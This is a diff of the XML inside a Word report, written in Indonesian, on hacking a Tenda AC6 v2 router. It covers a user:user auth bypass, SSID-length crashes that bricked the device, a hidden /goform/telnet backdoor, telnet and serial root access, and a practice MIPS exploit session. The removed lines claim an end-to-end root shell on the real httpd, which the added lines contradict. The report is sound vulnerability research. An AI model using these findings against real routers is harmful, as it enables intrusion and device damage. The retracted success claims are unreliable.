+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>File : US_AC6V2.0RTL_V15.03.06.52_multi_TDE01.bin  (u-boot legacy uImage, MIPS)</w:t>
+        <w:br/>
+        <w:t>Ukuran: 6,819,906 byte</w:t>
+        <w:br/>
+        <w:t>MD5  : 990011d052e061d842ab9a7007a20b86</w:t>
+        <w:br/>
+        <w:t>SHA256: 8afd50e3cddeb79030759cf73095fb3eb0ec20459f6a67fa419544d3f6e0b3bf</w:t>
+        <w:br/>
+        <w:t>Sumber: static.tenda.com.cn (AC6 v2.0 Firmware_V15.03.06.52)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>6.3 Alternatif</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>TFTP: set IP PC 192.168.0.2, jalankan TFTP server yang menyajikan .bin, masuk mode recovery seperti di atas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>UART serial (3.3V TTL): buka casing, sambung USB-TTL ke header GND/TX/RX/VCC, lihat log boot, hentikan bootloader, dan reflash. Metode paling pasti (sekaligus latihan hardware hacking).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>7. Timeline Uji (Ringkas)</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="LightGrid-Accent1"/>
+        <w:tblW w:type="auto" w:w="0"/>
+        <w:jc w:val="center"/>
+        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+        <w:gridCol w:w="2880"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Waktu</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Aksi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:sz w:val="19"/>
+              </w:rPr>
+              <w:t>Hasil</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T0</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Auth bypass user:user</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Cookie sesi didapat (302 + Set-Cookie)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>POST getProduct dengan cookie</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200 JSON -&gt; sesi sah</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T2</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>POST ssid=TESTPROBE</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200 {"errCode":0} (handler menyimpan ssid)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Matriks ssid N=64..500</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>200 {"errCode":0}</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Matriks ssid N=600..800</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>000 (koneksi drop / httpd crash)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T5</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Monitor ping 70 dtk</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>tetap UP (yang crash proses httpd, bukan kernel)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T6</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Setelah beberapa saat / power-cycle</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>LAN+WiFi tidak naik (CFG rusak)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>T7</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Rencana pemulihan</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="2880"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="18"/>
+              </w:rPr>
+              <w:t>Emergency Web Mode + firmware resmi</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>8. Status Emulasi (Mengapa Ini Penting)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Emulasi firmware (FirmAE/qemu) sempat membuat `bin/httpd` LISTEN di 192.168.0.1:80, tetapi request tidak dilayani karena ketergantungan CFM (Realtek).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Analisis: client CFM di libCfm memakai socket AF_UNIX **SOCK_DGRAM**; `cfm_stub` buatan kita sudah bind ke /var/cfm_socket (terlihat di /proc/net/unix) tetapi httpd tetap melaporkan `connect: Connection refused`.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>`LD_PRELOAD` diabaikan karena loader uClibc (perangkat memakai `/lib/ld-uClibc.so.0`), sehingga teknik hook ala writeup tidak langsung jalan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Kesimpulan: untuk RCE penuh, lanjutkan di emulasi/harness dengan pendekatan yang benar (stub libCfm/cfm client atau patch alur CFM), BUKAN di perangkat asli.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>9. Aturan Aman (Checklist Sebelum Uji)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Selalu reproduksi di emulasi/VM terisolasi tanpa rute ke LAN produksi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Verifikasi crash di proses (HTTP), bukan hanya ping — crash userspace tidak menurunkan ping.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Untuk endpoint 'setter', asumsikan input disimpan ke CFG/NVRAM: batasi panjang, siapkan firmware pemulihan.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Siapkan selalu: mode recovery + firmware resmi + (idealnya) akses UART sebelum menyentuh hardware.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Jangan pernah menguji payload memori ke perangkat yang dipakai sehari-hari.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="888888"/>
+          <w:sz w:val="44"/>
+        </w:rPr>
+        <w:t>BAGIAN VII</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:color w:val="0B3D91"/>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Temuan Lanjutan (Backdoor, Privesc, Root Shell)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
         <w:t>Temuan pada rootfs Tenda (keluarga firmware sama dengan studi kasus). Data pribadi diredaksi.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>F-02 — Akun Sistem ber-UID 0 dengan Password Lemah (Privesc)</w:t>
@@ -16109,7 +17825,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
       </w:pPr>
       <w:r>
         <w:t>Verifikasi password (DES crypt)</w:t>
@@ -16191,7 +17907,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>F-03 — Telnetd Aktif Saat Boot (Root Shell via Telnet)</w:t>
@@ -16248,7 +17964,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>F-04 — Endpoint Tersembunyi /goform/telnet (Backdoor On-Demand)</w:t>
@@ -16360,7 +18076,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>F-08 — Permukaan Command Injection</w:t>
@@ -16396,7 +18112,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>F-11 — Telemetri / Partner Pihak Ketiga (Privasi)</w:t>
@@ -16431,7 +18147,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t xml:space="preserve">F-12 — Root via Konsol Serial (Sulogin) </w:t>
@@ -16458,7 +18174,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>Rantai Serangan (Ringkas)</w:t>
@@ -16729,7 +18445,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>Rekomendasi</w:t>
@@ -16789,7 +18505,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -16799,9 +18514,9 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
-        </w:rPr>
-        <w:t>BAGIAN VI</w:t>
+          <w:sz w:val="44"/>
+        </w:rPr>
+        <w:t>BAGIAN VIII</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -16813,9 +18528,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Bukti Backdoor user:user (Reverse Engineering dengan Ghidra)</w:t>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Bukti Backdoor user:user (Ghidra)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -16841,7 +18561,7 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>1. Jalan Pintas yang Berhasil</w:t>
@@ -16849,7 +18569,34 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Pembaruan: rootfs Tenda ini sempat sulit diekstrak, tetapi akhirnya berhasil. Dari rootfs asli kita memperoleh bin/httpd nyata. Analisis statis (Binary Ninja) pada biner inilah yang mengungkap backdoor user:user dan overflow strcpy pada form_fast_setting_wifi_set.</w:t>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Firmware AC6 v2 Anda memakai </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>SquashFS kustom/terenkripsi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (tiap blok ber-marker `Tenda\0\0\1`, tidak ada magic xz, dan tidak ada codec standar yang cocok) sehingga rootfs-nya tidak bisa diekstrak cepat. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Tapi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> httpd Tenda generasi sama sudah di-ekstrak publik. Kita ambil dari repositori GitHub (rootfs hasil ekstrak), lalu menganalisis binary-nya di Ghidra.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -17019,7 +18766,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>2. Bukti Kredensial Bawaan (default.cfg)</w:t>
@@ -17078,7 +18825,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>3. Membaca Kode di Ghidra</w:t>
@@ -17094,7 +18841,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.1 Fungsi fromSysToolBaseUser (menangani akun dasar user:user)</w:t>
@@ -17162,7 +18909,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.2 Fungsi R7WebsSecurityHandler (gerbang autentikasi)</w:t>
@@ -17230,7 +18977,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.3 String /login/Auth dan XREF-nya</w:t>
@@ -17298,7 +19045,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>4. Potongan Kode (Decompiler)</w:t>
@@ -17306,7 +19053,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.1 fromSysToolBaseUser</w:t>
@@ -17353,7 +19100,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.2 SysToolpassword (membaca kredensial)</w:t>
@@ -17384,7 +19131,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.3 FUN_000320b4 (perbandingan password)</w:t>
@@ -17411,7 +19158,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>5. Kesimpulan &amp; Kaitan ke Eksploit Anda</w:t>
@@ -17451,7 +19198,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>6. Reproduce</w:t>
@@ -17496,7 +19243,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -17506,9 +19252,9 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
-        </w:rPr>
-        <w:t>BAGIAN VII</w:t>
+          <w:sz w:val="44"/>
+        </w:rPr>
+        <w:t>BAGIAN IX</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17520,9 +19266,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Sesi Live (Ghidra, Cutter, GDB + Eksploitasi)</w:t>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Sesi Live (Ghidra, Cutter, GDB)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -17863,7 +19614,12 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t>CATATAN PEMBARUAN: target httpd ASLI sudah tersedia (firmware/httpd) dan berhasil dieksploitasi end-to-end. Biner latihan MIPS hanya dipakai sebagai pelengkap pedagogis; seluruh temuan diverifikasi pada biner nyata.</w:t>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="555555"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Catatan: karena firmware Tenda memakai SquashFS kustom (tidak bisa diekstrak tool umum), binary target httpd-nya belum tersedia. Untuk tetap menghadirkan sesi LIVE, kita merakit binary MIPS yang sengaja rentan (arsitektur identik: MIPS32 LE) sehingga proses RE dan eksploitasi bisa diperlihatkan utuh dan jujur.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17873,7 +19629,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>1. Binary Latihan (MIPS32 LE) — Kenapa &amp; Apa</w:t>
@@ -17925,7 +19681,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.1 Source (vuln.s)</w:t>
@@ -18000,7 +19756,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>1.2 Build (dengan binutils MIPS asli)</w:t>
@@ -18022,7 +19778,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>2. RE Statis — Cutter / rizin (GUI)</w:t>
@@ -18174,7 +19930,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>2.1 Membaca hasilnya</w:t>
@@ -18211,7 +19967,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>3. RE Statis — Ghidra (GUI)</w:t>
@@ -18291,7 +20047,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>3.1 Cara memakai (persis yang dilakukan)</w:t>
@@ -18353,7 +20109,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>4. Dynamic Analysis — GDB + QEMU (LIVE)</w:t>
@@ -18393,7 +20149,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.1 Percobaan 1 — kendali penuh PC (crash terkendali)</w:t>
@@ -18473,7 +20229,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.2 Percobaan 2 — eksekusi dialihkan ke fungsi penyerang</w:t>
@@ -18541,7 +20297,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.3 Poin belajar MIPS</w:t>
@@ -18573,7 +20329,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
+        <w:pStyle w:val="Heading4"/>
       </w:pPr>
       <w:r>
         <w:t>4.4 Hasil akhir: exploit berhasil</w:t>
@@ -18617,7 +20373,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>5. Memetakan ke Target NYATA (Tenda httpd)</w:t>
@@ -18856,15 +20612,18 @@
     <w:p/>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5.1 Status: TERATASI - RCE tercapai</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>PEMBARUAN: kendala ekstraksi sudah teratasi (rootfs &amp; bin/httpd asli diperoleh). Blocker emulasi (handler crash akibat CFM) juga teratasi: cfm_mib_dgram + patch libapmib + /cfg/mib.cfg. Eksploit offset 748 berhasil mendapat root shell di emulator terisolasi. Lihat bagian 'Reproduksi &amp; Verifikasi'.</w:t>
+        <w:pStyle w:val="Heading4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>5.1 Kendala &amp; langkah berikutnya</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="0"/>
+        </w:rPr>
+        <w:t>Firmware Tenda AC6 v2 memakai SquashFS kustom (tiap blok ber-marker `Tenda\0\0\1`, tanpa magic xz standar), sehingga `unsquashfs`/`sasquatch`/7z gagal. Artinya `httpd` asli belum berhasil diekstrak. Untuk melanjutkan ke target nyata:</w:t>
       </w:r>
     </w:p>
